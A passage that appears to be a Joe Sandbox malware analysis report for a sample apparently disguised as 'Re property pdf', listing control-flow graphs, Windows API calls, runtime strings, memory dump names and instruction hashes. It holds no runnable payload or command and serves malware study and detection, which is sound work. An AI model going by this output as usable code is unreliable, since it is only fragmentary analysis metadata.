                                                                                                                              • Instruction Fuzzy Hash: 50E1CD70A087429FD765CF28C884B2ABBF0BB89364F144AADF5E58B2D1D774D845CB42
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 01077BAC
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01077B7F
                                                                                                                              • RTL: Resource at %p, xrefs: 01077B8E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0107728C
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 010772C1
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01077294
                                                                                                                              • RTL: Resource at %p, xrefs: 010772A3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:10.4%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:62
                                                                                                                              Total number of Limit Nodes:6

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 011DD0BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 011DD0FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 011DD138
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 011DD191
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 011DD0BE
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 011DD0FB
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 011DD138
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 011DD191
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 011DAFFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 011D59C9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 011D59C9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 685 73733e8-737340d call 73707f8 688 7373422-73734b4 CreateIconFromResourceEx 685->688 689 737340f-737341f 685->689 692 73734b6-73734bc 688->692 693 73734bd-73734da 688->693 692->693
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.2119767729.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_7370000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 696 11dd689-11dd724 DuplicateHandle 697 11dd72d-11dd74a 696->697 698 11dd726-11dd72c 696->698 698->697
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011DD717
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 701 11dd690-11dd724 DuplicateHandle 702 11dd72d-11dd74a 701->702 703 11dd726-11dd72c 701->703 703->702
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011DD717
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 706 73707f8-73734b4 CreateIconFromResourceEx 708 73734b6-73734bc 706->708 709 73734bd-73734da 706->709 708->709
                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07373402,?,?,?,?,?), ref: 073734A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.2119767729.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_7370000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 712 11daf98-11dafd8 713 11dafda-11dafdd 712->713 714 11dafe0-11db00b GetModuleHandleW 712->714 713->714 715 11db00d-11db013 714->715 716 11db014-11db028 714->716 715->716
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 011DAFFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1913143750.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_11d0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.1879392869.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_107d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                              • Instruction ID: 99c8d633d645dfb543d26857fb5d97a9e35301936361e249cff352b47b403982
                                                                                                                              • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                              • Instruction Fuzzy Hash: F611BB75904280DFDB12CF54C5C0B15BFA2FF84224F28C6AAD8894B696C33AD44BCB61

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:0%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:5
                                                                                                                              Total number of Limit Nodes:1
                                                                                                                              execution_graph 62090 1852df0 LdrInitializeThunk 62092 1852c00 62094 1852c0a 62092->62094 62095 1852c11 62094->62095 62096 1852c1f LdrInitializeThunk 62094->62096

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 1852c0a-1852c0f 1 1852c11-1852c18 0->1 2 1852c1f-1852c26 LdrInitializeThunk 0->2
                                                                                                                              APIs
                                                                                                                              • LdrInitializeThunk.NTDLL(0186FD4F,000000FF,00000024,01906634,00000004,00000000,?,-00000018,7D810F61,?,?,01828B12,?,?,?,?), ref: 01852C24
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 2f8c2a7e7f2119047157fcddb2f4a6f5e494cf9f43b7f755912b50b067d213df
                                                                                                                              • Instruction ID: a92b9a01d327d72826e0690663e3123e9a344e096f897352b3e37720105f1ba9
                                                                                                                              • Opcode Fuzzy Hash: 2f8c2a7e7f2119047157fcddb2f4a6f5e494cf9f43b7f755912b50b067d213df
                                                                                                                              • Instruction Fuzzy Hash: F0B09B719015C5C9DB51E764460871B7905B7D1741F15C061D7074641F4738C6D5E276

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 4 1852df0-1852dfc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              • LdrInitializeThunk.NTDLL(0188E73E,0000005A,018ED040,00000020,00000000,018ED040,00000080,01874A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0185AE00), ref: 01852DFA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 43e04ffd4988209ce620d281ba18fb1dc1063e4cd66816fe6cf7cbb8dd072bd9
                                                                                                                              • Instruction ID: 75168c6075a1908cdb55ccc3240ae4b9c9454cc47f38d0db8a52f0379153c4ea
                                                                                                                              • Opcode Fuzzy Hash: 43e04ffd4988209ce620d281ba18fb1dc1063e4cd66816fe6cf7cbb8dd072bd9
                                                                                                                              • Instruction Fuzzy Hash: 9990027120150417D1117158450470B000D97D1342F95C412A5468558DD6568B56A222

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 5 18535c0-18535cc LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 3eff9917d9b19e73ee117543d228f78e073cddf200a51d20f37aec8a540976c2
                                                                                                                              • Instruction ID: 1d2091ef08af217f5abb9d48df9116cc458a6a862778378831fa01db73091989
                                                                                                                              • Opcode Fuzzy Hash: 3eff9917d9b19e73ee117543d228f78e073cddf200a51d20f37aec8a540976c2
                                                                                                                              • Instruction Fuzzy Hash: AC90027160560406D1007158451470A100997D1302F65C411A5468568DC7958B5566A3

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 6 42de63-42dea4 9 42dea6-42dec3 6->9 10 42defe-42df03 6->10 12 42ded6-42defb 9->12 13 42dec5-42decd 9->13 12->10 15 42ded3 13->15 15->12
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264273220.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_42d000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2a229219b317a9ccbb40cf6100e20a696e3432615629490669c4ea2199887e14
                                                                                                                              • Instruction ID: 43abe2dfc9eaaaebec6a380288e639c94385588247eb1fc800702e6ad04780ab
                                                                                                                              • Opcode Fuzzy Hash: 2a229219b317a9ccbb40cf6100e20a696e3432615629490669c4ea2199887e14
                                                                                                                              • Instruction Fuzzy Hash: 6C017571D1022C66EB20FB959C82F9DB7789B04304F8086DAA50CB7181FBB86748CF65

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 48624451-0
                                                                                                                              • Opcode ID: 7f44c372ece56943126d72de8bce590f903e33c1f196509cc4fcfab4ca7bfa66
                                                                                                                              • Instruction ID: 66832aca91ea15be7ea65d45e2ecd669a534775dc43b453f8ea013ac8c618048
                                                                                                                              • Opcode Fuzzy Hash: 7f44c372ece56943126d72de8bce590f903e33c1f196509cc4fcfab4ca7bfa66
                                                                                                                              • Instruction Fuzzy Hash: E251F5B6A0411AAFCB55EB9C889097EFBB9FB08344714822AF8A5D7641D734DF4087A1

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              Strings
                                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 018779D0, 018779F5
                                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 018779FA
                                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 018779D5
                                                                                                                              • SsHd, xrefs: 0182A3E4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
• Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                              • API String ID: 0-929470617
                                                                                                                              • Opcode ID: 3620fc122cafe169c33572ef46109a49a18b8e5fae67ea72c4513c503ffbd7e8
                                                                                                                              • Instruction ID: 1dea1f32d12ba1287eb2786102b86ead6d4f7e29f1c06b5a49f5d2a42ef70327
                                                                                                                              • Opcode Fuzzy Hash: 3620fc122cafe169c33572ef46109a49a18b8e5fae67ea72c4513c503ffbd7e8
                                                                                                                              • Instruction Fuzzy Hash: 7EE1C4716043118FE72ACE68C888B2BBBE5BF84318F144A2DF955CB691D771DB85CB42

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 01879341, 01879366
                                                                                                                              • GsHd, xrefs: 0182D874
                                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0187936B
                                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01879346
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
• Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                              • API String ID: 3446177414-576511823
                                                                                                                              • Opcode ID: f6974a684242795e857b73241c73a6b39eaf66ad5a5d4f487a84b43176c49bd1
                                                                                                                              • Instruction ID: b8030ba48ca5093f36bca077224d35fa26e9bf13c861a24db2331aa880d322d0
                                                                                                                              • Opcode Fuzzy Hash: f6974a684242795e857b73241c73a6b39eaf66ad5a5d4f487a84b43176c49bd1
                                                                                                                              • Instruction Fuzzy Hash: 44E1A471A04356CFDB25CF68C484B6ABBE5BF48318F044A2DF995CB281D771DA84CB52

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
• Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                                              • Instruction ID: c0fd7fe4c7cbb337bc7ce5a696cb3ec72474d7df15d4656bf008644882bc3219
                                                                                                                              • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                                              • Instruction Fuzzy Hash: DB81C170E052499FEFA58E6CC8917FEBBB3EF65360F184159EC61E7291C7348A408B61

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.2264932023.0000000001806000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
• Associated: 0000000C.00000002.2264932023.00000000017E0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.00000000017E7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001860000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001866000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.00000000018A2000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001903000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.2264932023.0000000001909000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_17e0000_hwOHPmqcegxcxb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 3446177414-1194432280
